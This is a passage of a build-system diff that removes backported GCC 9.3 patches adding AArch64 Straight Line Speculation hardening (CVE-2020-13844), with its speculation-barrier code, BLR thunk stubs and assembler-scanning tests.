351+ }
352+ return "b\\t%c1";
353+ }
354+ [(set_attr "type" "branch, branch")
355+ (set_attr "sls_length" "retbr,none")]
356 )
357
358 ;; Call subroutine returning any type.
359diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
360new file mode 100644
361index 000000000..7656123ee
362--- /dev/null
363+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
364@@ -0,0 +1,15 @@
365+/* Avoid ILP32 since pacret is only available for LP64 */
366+/* { dg-do compile { target { ! ilp32 } } } */
367+/* { dg-additional-options "-mharden-sls=retbr -mbranch-protection=pac-ret -march=armv8.3-a" } */
368+
369+/* Testing the do_return pattern for retaa. */
370+long retbr_subcall(void);
371+long retbr_do_return_retaa(void)
372+{
373+ return retbr_subcall()+1;
374+}
375+
376+/* Ensure there are no BR or RET instructions which are not directly followed
377+ by a speculation barrier. */
378+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb)} } } */
379+/* { dg-final { scan-assembler-not {ret\t} } } */
380diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
381new file mode 100644
382index 000000000..573b30cdc
383--- /dev/null
384+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
385@@ -0,0 +1,119 @@
386+/* We ensure that -Wpedantic is off since it complains about the trampolines
387+ we explicitly want to test. */
388+/* { dg-additional-options "-mharden-sls=retbr -Wno-pedantic " } */
389+/*
390+ Ensure that the SLS hardening of RET and BR leaves no unprotected RET/BR
391+ instructions.
392+ */
393+typedef int (foo) (int, int);
394+typedef void (bar) (int, int);
395+struct sls_testclass {
396+ foo *x;
397+ bar *y;
398+ int left;
399+ int right;
400+};
401+
402+int
403+retbr_sibcall_value_insn (struct sls_testclass x)
404+{
405+ return x.x(x.left, x.right);
406+}
407+
408+void
409+retbr_sibcall_insn (struct sls_testclass x)
410+{
411+ x.y(x.left, x.right);
412+}
413+
414+/* Aim to test two different returns.
415+ One that introduces a tail call in the middle of the function, and one that
416+ has a normal return. */
417+int
418+retbr_multiple_returns (struct sls_testclass x)
419+{
420+ int temp;
421+ if (x.left % 10)
422+ return x.x(x.left, 100);
423+ else if (x.right % 20)
424+ {
425+ return x.x(x.left * x.right, 100);
426+ }
427+ temp = x.left % x.right;
428+ temp *= 100;
429+ temp /= 2;
430+ return temp % 3;
431+}
432+
433+void
434+retbr_multiple_returns_void (struct sls_testclass x)
435+{
436+ if (x.left % 10)
437+ {
438+ x.y(x.left, 100);
439+ }
440+ else if (x.right % 20)
441+ {
442+ x.y(x.left * x.right, 100);
443+ }
444+ return;
445+}
446+
447+/* Testing the casesi jump via register. */
448+__attribute__ ((optimize ("Os")))
449+int
450+retbr_casesi_dispatch (struct sls_testclass x)
451+{
452+ switch (x.left)
453+ {
454+ case -5:
455+ return -2;
456+ case -3:
457+ return -1;
458+ case 0:
459+ return 0;
460+ case 3:
461+ return 1;
462+ case 5:
463+ break;
464+ default:
465+ __builtin_unreachable ();
466+ }
467+ return x.right;
468+}
469+
470+/* Testing the BR in trampolines is mitigated against. */
471+void f1 (void *);
472+void f3 (void *, void (*)(void *));
473+void f2 (void *);
474+
475+int
476+retbr_trampolines (void *a, int b)
477+{
478+ if (!b)
479+ {
480+ f1 (a);
481+ return 1;
482+ }
483+ if (b)
484+ {
485+ void retbr_tramp_internal (void *c)
486+ {
487+ if (c == a)
488+ f2 (c);
489+ }
490+ f3 (a, retbr_tramp_internal);
491+ }
492+ return 0;
493+}
494+
495+/* Testing the indirect_jump pattern. */
496+void
497+retbr_indirect_jump (int *buf)
498+{
499+ __builtin_longjmp(buf, 1);
500+}
501+
502+/* Ensure there are no BR or RET instructions which are not directly followed
503+ by a speculation barrier. */
504+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb|sb)} } } */
505diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
506new file mode 100644
507index 000000000..812250379
508--- /dev/null
509+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
510@@ -0,0 +1,73 @@
511+# Regression driver for SLS mitigation on AArch64.
512+# Copyright (C) 2020 Free Software Foundation, Inc.
513+# Contributed by ARM Ltd.
514+#
515+# This file is part of GCC.
516+#
517+# GCC is free software; you can redistribute it and/or modify it
518+# under the terms of the GNU General Public License as published by
519+# the Free Software Foundation; either version 3, or (at your option)
520+# any later version.
521+#
522+# GCC is distributed in the hope that it will be useful, but
523+# WITHOUT ANY WARRANTY; without even the implied warranty of
524+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
525+# General Public License for more details.
526+#
527+# You should have received a copy of the GNU General Public License
528+# along with GCC; see the file COPYING3. If not see
529+# <http://www.gnu.org/licenses/>. */
530+
531+# Exit immediately if this isn't an AArch64 target.
532+if {![istarget aarch64*-*-*] } then {
533+ return
534+}
535+
536+# Load support procs.
537+load_lib gcc-dg.exp
538+load_lib torture-options.exp
539+
540+# If a testcase doesn't have special options, use these.
541+global DEFAULT_CFLAGS
542+if ![info exists DEFAULT_CFLAGS] then {
543+ set DEFAULT_CFLAGS " "
544+}
545+
546+# Initialize `dg'.
547+dg-init
548+torture-init
549+
550+# Use different architectures as well as the normal optimisation options.
551+# (i.e. use both SB and DSB+ISB barriers).
552+
553+set save-dg-do-what-default ${dg-do-what-default}
554+# Main loop.
555+# Run with torture tests (i.e. a bunch of different optimisation levels) just
556+# to increase test coverage.
557+set dg-do-what-default assemble
558+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
559+ "-save-temps" $DEFAULT_CFLAGS
560+
561+# Run the same tests but this time with SB extension.
562+# Since not all supported assemblers will support that extension we decide
563+# whether to assemble or just compile based on whether the extension is
564+# supported for the available assembler.
565+
566+set templist {}
567+foreach x $DG_TORTURE_OPTIONS {
568+ lappend templist "$x -march=armv8.3-a+sb "
569+ lappend templist "$x -march=armv8-a+sb "
570+}
571+set-torture-options $templist
572+if { [check_effective_target_aarch64_asm_sb_ok] } {
573+ set dg-do-what-default assemble
574+} else {
575+ set dg-do-what-default compile
576+}
577+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
578+ "-save-temps" $DEFAULT_CFLAGS
579+set dg-do-what-default ${save-dg-do-what-default}
580+
581+# All done.
582+torture-finish
583+dg-finish
584diff --git a/gcc/testsuite/lib/target-supports.exp b/gcc/testsuite/lib/target-supports.exp
585index ea9a50ccb..79482f9b6 100644
586--- a/gcc/testsuite/lib/target-supports.exp
587+++ b/gcc/testsuite/lib/target-supports.exp
588@@ -8579,7 +8579,8 @@ proc check_effective_target_aarch64_tiny { } {
589 # Create functions to check that the AArch64 assembler supports the
590 # various architecture extensions via the .arch_extension pseudo-op.
591
592-foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"} {
593+foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"
594+ "sb"} {
595 eval [string map [list FUNC $aarch64_ext] {
596 proc check_effective_target_aarch64_asm_FUNC_ok { } {
597 if { [istarget aarch64*-*-*] } {
598--
5992.25.1
600
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch b/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch
deleted file mode 100644
index 6dffef0a34..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch
+++ /dev/null
@@ -1,659 +0,0 @@
1CVE: CVE-2020-13844
2Upstream-Status: Backport
3Signed-off-by: Ross Burton <ross.burton@arm.com>
4
5From 2155170525f93093b90a1a065e7ed71a925566e9 Mon Sep 17 00:00:00 2001
6From: Matthew Malcomson <matthew.malcomson@arm.com>
7Date: Thu, 9 Jul 2020 09:11:59 +0100
8Subject: [PATCH 3/3] aarch64: Mitigate SLS for BLR instruction
9
10This patch introduces the mitigation for Straight Line Speculation past
11the BLR instruction.
12
13This mitigation replaces BLR instructions with a BL to a stub which uses
14a BR to jump to the original value. These function stubs are then
15appended with a speculation barrier to ensure no straight line
16speculation happens after these jumps.
17
18When optimising for speed we use a set of stubs for each function since
19this should help the branch predictor make more accurate predictions
20about where a stub should branch.
21
22When optimising for size we use one set of stubs for all functions.
23This set of stubs can have human readable names, and we are using
24`__call_indirect_x<N>` for register x<N>.
25
26When BTI branch protection is enabled the BLR instruction can jump to a
27`BTI c` instruction using any register, while the BR instruction can
28only jump to a `BTI c` instruction using the x16 or x17 registers.
29Hence, in order to ensure this transformation is safe we mov the value
30of the original register into x16 and use x16 for the BR.
31
32As an example when optimising for size:
33a
34 BLR x0
35instruction would get transformed to something like
36 BL __call_indirect_x0
37where __call_indirect_x0 labels a thunk that contains
38__call_indirect_x0:
39 MOV X16, X0
40 BR X16
41 <speculation barrier>
42
43The first version of this patch used local symbols specific to a
44compilation unit to try and avoid relocations.
45This was mistaken since functions coming from the same compilation unit
46can still be in different sections, and the assembler will insert
47relocations at jumps between sections.
48
49On any relocation the linker is permitted to emit a veneer to handle
50jumps between symbols that are very far apart. The registers x16 and
51x17 may be clobbered by these veneers.
52Hence the function stubs cannot rely on the values of x16 and x17 being
53the same as just before the function stub is called.
54
55Similar can be said for the hot/cold partitioning of single functions,
56so function-local stubs have the same restriction.
57
58This updated version of the patch never emits function stubs for x16 and
59x17, and instead forces other registers to be used.
60
61Given the above, there is now no benefit to local symbols (since they
62are not enough to avoid dealing with linker intricacies). This patch
63now uses global symbols with hidden visibility each stored in their own
64COMDAT section. This means stubs can be shared between compilation
65units while still avoiding the PLT indirection.
66
67This patch also removes the `__call_indirect_x30` stub (and
68function-local equivalent) which would simply jump back to the original
69location.
70
71The function-local stubs are emitted to the assembly output file in one
72chunk, which means we need not add the speculation barrier directly
73after each one.
74This is because we know for certain that the instructions directly after
75the BR in all but the last function stub will be from another one of
76these stubs and hence will not contain a speculation gadget.
77Instead we add a speculation barrier at the end of the sequence of
78stubs.
79
80The global stubs are emitted in COMDAT/.linkonce sections by
81themselves so that the linker can remove duplicates from multiple object
82files. This means they are not emitted in one chunk, and each one must
83include the speculation barrier.
84
85Another difference is that since the global stubs are shared across
86compilation units we do not know that all functions will be targeting an
87architecture supporting the SB instruction.
88Rather than provide multiple stubs for each architecture, we provide a
89stub that will work for all architectures -- using the DSB+ISB barrier.
90
91This mitigation does not apply for BLR instructions in the following
92places:
93- Some accesses to thread-local variables use a code sequence with a BLR
94 instruction. This code sequence is part of the binary interface between
95 compiler and linker. If this BLR instruction needs to be mitigated, it'd
96 probably be best to do so in the linker. It seems that the code sequence
97 for thread-local variable access is unlikely to lead to a Spectre Revalation
98 Gadget.
99- PLT stubs are produced by the linker and each contain a BLR instruction.
100 It seems that at most only after the last PLT stub a Spectre Revalation
101 Gadget might appear.
102
103Testing:
104 Bootstrap and regtest on AArch64
105 (with BOOT_CFLAGS="-mharden-sls=retbr,blr")
106 Used a temporary hack(1) in gcc-dg.exp to use these options on every
107 test in the testsuite, a slight modification to emit the speculation
108 barrier after every function stub, and a script to check that the
109 output never emitted a BLR, or unmitigated BR or RET instruction.
110 Similar on an aarch64-none-elf cross-compiler.
111
1121) Temporary hack emitted a speculation barrier at the end of every stub
113function, and used a script to ensure that:
114 a) Every RET or BR is immediately followed by a speculation barrier.
115 b) No BLR instruction is emitted by compiler.
116
117(cherry picked from 96b7f495f9269d5448822e4fc28882edb35a58d7)
118
119gcc/ChangeLog:
120
121 * config/aarch64/aarch64-protos.h (aarch64_indirect_call_asm):
122 New declaration.
123 * config/aarch64/aarch64.c (aarch64_regno_regclass): Handle new
124 stub registers class.
125 (aarch64_class_max_nregs): Likewise.
126 (aarch64_register_move_cost): Likewise.
127 (aarch64_sls_shared_thunks): Global array to store stub labels.
128 (aarch64_sls_emit_function_stub): New.
129 (aarch64_create_blr_label): New.
130 (aarch64_sls_emit_blr_function_thunks): New.
131 (aarch64_sls_emit_shared_blr_thunks): New.
132 (aarch64_asm_file_end): New.
133 (aarch64_indirect_call_asm): New.
134 (TARGET_ASM_FILE_END): Use aarch64_asm_file_end.
135 (TARGET_ASM_FUNCTION_EPILOGUE): Use
136 aarch64_sls_emit_blr_function_thunks.
137 * config/aarch64/aarch64.h (STB_REGNUM_P): New.
138 (enum reg_class): Add STUB_REGS class.
139 (machine_function): Introduce `call_via` array for
140 function-local stub labels.
141 * config/aarch64/aarch64.md (*call_insn, *call_value_insn): Use
142 aarch64_indirect_call_asm to emit code when hardening BLR
143 instructions.
144 * config/aarch64/constraints.md (Ucr): New constraint
145 representing registers for indirect calls. Is GENERAL_REGS
146 usually, and STUB_REGS when hardening BLR instruction against
147 SLS.
148 * config/aarch64/predicates.md (aarch64_general_reg): STUB_REGS class
149 is also a general register.
150
151gcc/testsuite/ChangeLog:
152
153 * gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c: New test.
154 * gcc.target/aarch64/sls-mitigation/sls-miti-blr.c: New test.
155---
156 gcc/config/aarch64/aarch64-protos.h | 1 +
157 gcc/config/aarch64/aarch64.c | 225 +++++++++++++++++-
158 gcc/config/aarch64/aarch64.h | 15 ++
159 gcc/config/aarch64/aarch64.md | 11 +-
160 gcc/config/aarch64/constraints.md | 9 +
161 gcc/config/aarch64/predicates.md | 3 +-
162 .../aarch64/sls-mitigation/sls-miti-blr-bti.c | 40 ++++
163 .../aarch64/sls-mitigation/sls-miti-blr.c | 33 +++
164 8 files changed, 328 insertions(+), 9 deletions(-)
165 create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
166 create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
167
168diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
169index 885eae893..2676e43ae 100644
170--- a/gcc/config/aarch64/aarch64-protos.h
171+++ b/gcc/config/aarch64/aarch64-protos.h
172@@ -645,6 +645,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
173 bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
174
175 const char *aarch64_sls_barrier (int);
176+const char *aarch64_indirect_call_asm (rtx);
177 extern bool aarch64_harden_sls_retbr_p (void);
178 extern bool aarch64_harden_sls_blr_p (void);
179
180diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
181index dff61105c..bc6c02c3a 100644
182--- a/gcc/config/aarch64/aarch64.c
183+++ b/gcc/config/aarch64/aarch64.c
184@@ -8190,6 +8190,9 @@ aarch64_label_mentioned_p (rtx x)
185 enum reg_class
186 aarch64_regno_regclass (unsigned regno)
187 {
188+ if (STUB_REGNUM_P (regno))
189+ return STUB_REGS;
190+
191 if (GP_REGNUM_P (regno))
192 return GENERAL_REGS;
193
194@@ -8499,6 +8502,7 @@ aarch64_class_max_nregs (reg_class_t regclass, machine_mode mode)
195 unsigned int nregs;
196 switch (regclass)
197 {
198+ case STUB_REGS:
199 case TAILCALL_ADDR_REGS:
200 case POINTER_REGS:
201 case GENERAL_REGS:
202@@ -10693,10 +10697,12 @@ aarch64_register_move_cost (machine_mode mode,
203 = aarch64_tune_params.regmove_cost;
204
205 /* Caller save and pointer regs are equivalent to GENERAL_REGS. */
206- if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS)
207+ if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS
208+ || to == STUB_REGS)
209 to = GENERAL_REGS;
210
211- if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS)
212+ if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS
213+ || from == STUB_REGS)
214 from = GENERAL_REGS;
215
216 /* Moving between GPR and stack cost is the same as GP2GP. */
217@@ -19009,6 +19015,215 @@ aarch64_sls_barrier (int mitigation_required)
218 : "";
219 }
220
221+static GTY (()) tree aarch64_sls_shared_thunks[30];
222+static GTY (()) bool aarch64_sls_shared_thunks_needed = false;
223+const char *indirect_symbol_names[30] = {
224+ "__call_indirect_x0",
225+ "__call_indirect_x1",
226+ "__call_indirect_x2",
227+ "__call_indirect_x3",
228+ "__call_indirect_x4",
229+ "__call_indirect_x5",
230+ "__call_indirect_x6",
231+ "__call_indirect_x7",
232+ "__call_indirect_x8",
233+ "__call_indirect_x9",
234+ "__call_indirect_x10",
235+ "__call_indirect_x11",
236+ "__call_indirect_x12",
237+ "__call_indirect_x13",
238+ "__call_indirect_x14",
239+ "__call_indirect_x15",
240+ "", /* "__call_indirect_x16", */
241+ "", /* "__call_indirect_x17", */
242+ "__call_indirect_x18",
243+ "__call_indirect_x19",
244+ "__call_indirect_x20",
245+ "__call_indirect_x21",
246+ "__call_indirect_x22",
247+ "__call_indirect_x23",
248+ "__call_indirect_x24",
249+ "__call_indirect_x25",
250+ "__call_indirect_x26",
251+ "__call_indirect_x27",
252+ "__call_indirect_x28",
253+ "__call_indirect_x29",
254+};
255+
256+/* Function to create a BLR thunk. This thunk is used to mitigate straight
257+ line speculation. Instead of a simple BLR that can be speculated past,
258+ we emit a BL to this thunk, and this thunk contains a BR to the relevant
259+ register. These thunks have the relevant speculation barries put after
260+ their indirect branch so that speculation is blocked.
261+
262+ We use such a thunk so the speculation barriers are kept off the
263+ architecturally executed path in order to reduce the performance overhead.
264+
265+ When optimizing for size we use stubs shared by the linked object.
266+ When optimizing for performance we emit stubs for each function in the hope
267+ that the branch predictor can better train on jumps specific for a given
268+ function. */
269+rtx
270+aarch64_sls_create_blr_label (int regnum)
271+{
272+ gcc_assert (STUB_REGNUM_P (regnum));
273+ if (optimize_function_for_size_p (cfun))
274+ {
275+ /* For the thunks shared between different functions in this compilation
276+ unit we use a named symbol -- this is just for users to more easily
277+ understand the generated assembly. */
278+ aarch64_sls_shared_thunks_needed = true;
279+ const char *thunk_name = indirect_symbol_names[regnum];
280+ if (aarch64_sls_shared_thunks[regnum] == NULL)
281+ {
282+ /* Build a decl representing this function stub and record it for
283+ later. We build a decl here so we can use the GCC machinery for
284+ handling sections automatically (through `get_named_section` and
285+ `make_decl_one_only`). That saves us a lot of trouble handling
286+ the specifics of different output file formats. */
287+ tree decl = build_decl (BUILTINS_LOCATION, FUNCTION_DECL,
288+ get_identifier (thunk_name),
289+ build_function_type_list (void_type_node,
290+ NULL_TREE));
291+ DECL_RESULT (decl) = build_decl (BUILTINS_LOCATION, RESULT_DECL,
292+ NULL_TREE, void_type_node);
293+ TREE_PUBLIC (decl) = 1;
294+ TREE_STATIC (decl) = 1;
295+ DECL_IGNORED_P (decl) = 1;
296+ DECL_ARTIFICIAL (decl) = 1;
297+ make_decl_one_only (decl, DECL_ASSEMBLER_NAME (decl));
298+ resolve_unique_section (decl, 0, false);
299+ aarch64_sls_shared_thunks[regnum] = decl;
300+ }
301+
302+ return gen_rtx_SYMBOL_REF (Pmode, thunk_name);
303+ }
304+
305+ if (cfun->machine->call_via[regnum] == NULL)
306+ cfun->machine->call_via[regnum]
307+ = gen_rtx_LABEL_REF (Pmode, gen_label_rtx ());
308+ return cfun->machine->call_via[regnum];
309+}
310+
311+/* Helper function for aarch64_sls_emit_blr_function_thunks and
312+ aarch64_sls_emit_shared_blr_thunks below. */
313+static void
314+aarch64_sls_emit_function_stub (FILE *out_file, int regnum)
315+{
316+ /* Save in x16 and branch to that function so this transformation does
317+ not prevent jumping to `BTI c` instructions. */
318+ asm_fprintf (out_file, "\tmov\tx16, x%d\n", regnum);
319+ asm_fprintf (out_file, "\tbr\tx16\n");
320+}
321+
322+/* Emit all BLR stubs for this particular function.
323+ Here we emit all the BLR stubs needed for the current function. Since we
324+ emit these stubs in a consecutive block we know there will be no speculation
325+ gadgets between each stub, and hence we only emit a speculation barrier at
326+ the end of the stub sequences.
327+
328+ This is called in the TARGET_ASM_FUNCTION_EPILOGUE hook. */
329+void
330+aarch64_sls_emit_blr_function_thunks (FILE *out_file)
331+{
332+ if (! aarch64_harden_sls_blr_p ())
333+ return;
334+
335+ bool any_functions_emitted = false;
336+ /* We must save and restore the current function section since this assembly
337+ is emitted at the end of the function. This means it can be emitted *just
338+ after* the cold section of a function. That cold part would be emitted in
339+ a different section. That switch would trigger a `.cfi_endproc` directive
340+ to be emitted in the original section and a `.cfi_startproc` directive to
341+ be emitted in the new section. Switching to the original section without
342+ restoring would mean that the `.cfi_endproc` emitted as a function ends
343+ would happen in a different section -- leaving an unmatched
344+ `.cfi_startproc` in the cold text section and an unmatched `.cfi_endproc`
345+ in the standard text section. */
346+ section *save_text_section = in_section;
347+ switch_to_section (function_section (current_function_decl));
348+ for (int regnum = 0; regnum < 30; ++regnum)
349+ {
350+ rtx specu_label = cfun->machine->call_via[regnum];
351+ if (specu_label == NULL)
352+ continue;
353+
354+ targetm.asm_out.print_operand (out_file, specu_label, 0);
355+ asm_fprintf (out_file, ":\n");
356+ aarch64_sls_emit_function_stub (out_file, regnum);
357+ any_functions_emitted = true;
358+ }
359+ if (any_functions_emitted)
360+ /* Can use the SB if needs be here, since this stub will only be used
361+ by the current function, and hence for the current target. */
362+ asm_fprintf (out_file, "\t%s\n", aarch64_sls_barrier (true));
363+ switch_to_section (save_text_section);
364+}
365+
366+/* Emit shared BLR stubs for the current compilation unit.
367+ Over the course of compiling this unit we may have converted some BLR
368+ instructions to a BL to a shared stub function. This is where we emit those
369+ stub functions.
370+ This function is for the stubs shared between different functions in this
371+ compilation unit. We share when optimizing for size instead of speed.
372+
373+ This function is called through the TARGET_ASM_FILE_END hook. */
374+void
375+aarch64_sls_emit_shared_blr_thunks (FILE *out_file)
376+{
377+ if (! aarch64_sls_shared_thunks_needed)
378+ return;
379+
380+ for (int regnum = 0; regnum < 30; ++regnum)
381+ {
382+ tree decl = aarch64_sls_shared_thunks[regnum];
383+ if (!decl)
384+ continue;
385+
386+ const char *name = indirect_symbol_names[regnum];
387+ switch_to_section (get_named_section (decl, NULL, 0));
388+ ASM_OUTPUT_ALIGN (out_file, 2);
389+ targetm.asm_out.globalize_label (out_file, name);
390+ /* Only emits if the compiler is configured for an assembler that can
391+ handle visibility directives. */
392+ targetm.asm_out.assemble_visibility (decl, VISIBILITY_HIDDEN);
393+ ASM_OUTPUT_TYPE_DIRECTIVE (out_file, name, "function");
394+ ASM_OUTPUT_LABEL (out_file, name);
395+ aarch64_sls_emit_function_stub (out_file, regnum);
396+ /* Use the most conservative target to ensure it can always be used by any
397+ function in the translation unit. */
398+ asm_fprintf (out_file, "\tdsb\tsy\n\tisb\n");
399+ ASM_DECLARE_FUNCTION_SIZE (out_file, name, decl);
400+ }
401+}
402+
403+/* Implement TARGET_ASM_FILE_END. */
404+void
405+aarch64_asm_file_end ()
406+{
407+ aarch64_sls_emit_shared_blr_thunks (asm_out_file);
408+ /* Since this function will be called for the ASM_FILE_END hook, we ensure
409+ that what would be called otherwise (e.g. `file_end_indicate_exec_stack`
410+ for FreeBSD) still gets called. */
411+#ifdef TARGET_ASM_FILE_END
412+ TARGET_ASM_FILE_END ();
413+#endif
414+}
415+
416+const char *
417+aarch64_indirect_call_asm (rtx addr)
418+{
419+ gcc_assert (REG_P (addr));
420+ if (aarch64_harden_sls_blr_p ())
421+ {
422+ rtx stub_label = aarch64_sls_create_blr_label (REGNO (addr));
423+ output_asm_insn ("bl\t%0", &stub_label);
424+ }
425+ else
426+ output_asm_insn ("blr\t%0", &addr);
427+ return "";
428+}
429+
430 /* Target-specific selftests. */
431
432 #if CHECKING_P
433@@ -19529,6 +19744,12 @@ aarch64_libgcc_floating_mode_supported_p
434 #define TARGET_RUN_TARGET_SELFTESTS selftest::aarch64_run_selftests
435 #endif /* #if CHECKING_P */
436
437+#undef TARGET_ASM_FILE_END
438+#define TARGET_ASM_FILE_END aarch64_asm_file_end
439+
440+#undef TARGET_ASM_FUNCTION_EPILOGUE
441+#define TARGET_ASM_FUNCTION_EPILOGUE aarch64_sls_emit_blr_function_thunks
442+
443 struct gcc_target targetm = TARGET_INITIALIZER;
444
445 #include "gt-aarch64.h"
446diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
447index 72ddc6fd9..60682a100 100644
448--- a/gcc/config/aarch64/aarch64.h
449+++ b/gcc/config/aarch64/aarch64.h
450@@ -540,6 +540,16 @@ extern unsigned aarch64_architecture_version;
451 #define GP_REGNUM_P(REGNO) \
452 (((unsigned) (REGNO - R0_REGNUM)) <= (R30_REGNUM - R0_REGNUM))
453
454+/* Registers known to be preserved over a BL instruction. This consists of the
455+ GENERAL_REGS without x16, x17, and x30. The x30 register is changed by the
456+ BL instruction itself, while the x16 and x17 registers may be used by
457+ veneers which can be inserted by the linker. */
458+#define STUB_REGNUM_P(REGNO) \
459+ (GP_REGNUM_P (REGNO) \
460+ && (REGNO) != R16_REGNUM \
461+ && (REGNO) != R17_REGNUM \
462+ && (REGNO) != R30_REGNUM) \
463+
464 #define FP_REGNUM_P(REGNO) \
465 (((unsigned) (REGNO - V0_REGNUM)) <= (V31_REGNUM - V0_REGNUM))
466
467@@ -561,6 +571,7 @@ enum reg_class
468 {
469 NO_REGS,
470 TAILCALL_ADDR_REGS,
471+ STUB_REGS,
472 GENERAL_REGS,
473 STACK_REG,
474 POINTER_REGS,
475@@ -580,6 +591,7 @@ enum reg_class
476 { \
477 "NO_REGS", \
478 "TAILCALL_ADDR_REGS", \
479+ "STUB_REGS", \
480 "GENERAL_REGS", \
481 "STACK_REG", \
482 "POINTER_REGS", \
483@@ -596,6 +608,7 @@ enum reg_class
484 { \
485 { 0x00000000, 0x00000000, 0x00000000 }, /* NO_REGS */ \
486 { 0x00030000, 0x00000000, 0x00000000 }, /* TAILCALL_ADDR_REGS */\
487+ { 0x3ffcffff, 0x00000000, 0x00000000 }, /* STUB_REGS */ \
488 { 0x7fffffff, 0x00000000, 0x00000003 }, /* GENERAL_REGS */ \
489 { 0x80000000, 0x00000000, 0x00000000 }, /* STACK_REG */ \
490 { 0xffffffff, 0x00000000, 0x00000003 }, /* POINTER_REGS */ \
491@@ -735,6 +748,8 @@ typedef struct GTY (()) machine_function
492 struct aarch64_frame frame;
493 /* One entry for each hard register. */
494 bool reg_is_wrapped_separately[LAST_SAVED_REGNUM];
495+ /* One entry for each general purpose register. */
496+ rtx call_via[SP_REGNUM];
497 bool label_is_assembled;
498 } machine_function;
499 #endif
500diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
501index 494aee964..ed8cf8ece 100644
502--- a/gcc/config/aarch64/aarch64.md
503+++ b/gcc/config/aarch64/aarch64.md
504@@ -908,15 +908,14 @@
505 )
506
507 (define_insn "*call_insn"
508- [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "r, Usf"))
509+ [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "Ucr, Usf"))
510 (match_operand 1 "" ""))
511 (clobber (reg:DI LR_REGNUM))]
512 ""
513 "@
514- blr\\t%0
515+ * return aarch64_indirect_call_asm (operands[0]);
516 bl\\t%c0"
517- [(set_attr "type" "call, call")]
518-)
519+ [(set_attr "type" "call, call")])
520
521 (define_expand "call_value"
522 [(parallel [(set (match_operand 0 "" "")
523@@ -934,12 +933,12 @@
524
525 (define_insn "*call_value_insn"
526 [(set (match_operand 0 "" "")
527- (call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "r, Usf"))
528+ (call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "Ucr, Usf"))
529 (match_operand 2 "" "")))
530 (clobber (reg:DI LR_REGNUM))]
531 ""
532 "@
533- blr\\t%1
534+ * return aarch64_indirect_call_asm (operands[1]);
535 bl\\t%c1"
536 [(set_attr "type" "call, call")]
537 )
538diff --git a/gcc/config/aarch64/constraints.md b/gcc/config/aarch64/constraints.md
539index 21f9549e6..7756dbe83 100644
540--- a/gcc/config/aarch64/constraints.md
541+++ b/gcc/config/aarch64/constraints.md
542@@ -24,6 +24,15 @@
543 (define_register_constraint "Ucs" "TAILCALL_ADDR_REGS"
544 "@internal Registers suitable for an indirect tail call")
545
546+(define_register_constraint "Ucr"
547+ "aarch64_harden_sls_blr_p () ? STUB_REGS : GENERAL_REGS"
548+ "@internal Registers to be used for an indirect call.
549+ This is usually the general registers, but when we are hardening against
550+ Straight Line Speculation we disallow x16, x17, and x30 so we can use
551+ indirection stubs. These indirection stubs cannot use the above registers
552+ since they will be reached by a BL that may have to go through a linker
553+ veneer.")
554+
555 (define_register_constraint "w" "FP_REGS"
556 "Floating point and SIMD vector registers.")
557
558diff --git a/gcc/config/aarch64/predicates.md b/gcc/config/aarch64/predicates.md
559index 8e1b78421..4250aecb3 100644
560--- a/gcc/config/aarch64/predicates.md
561+++ b/gcc/config/aarch64/predicates.md
562@@ -32,7 +32,8 @@
563
564 (define_predicate "aarch64_general_reg"
565 (and (match_operand 0 "register_operand")
566- (match_test "REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
567+ (match_test "REGNO_REG_CLASS (REGNO (op)) == STUB_REGS
568+ || REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
569
570 ;; Return true if OP a (const_int 0) operand.
571 (define_predicate "const0_operand"
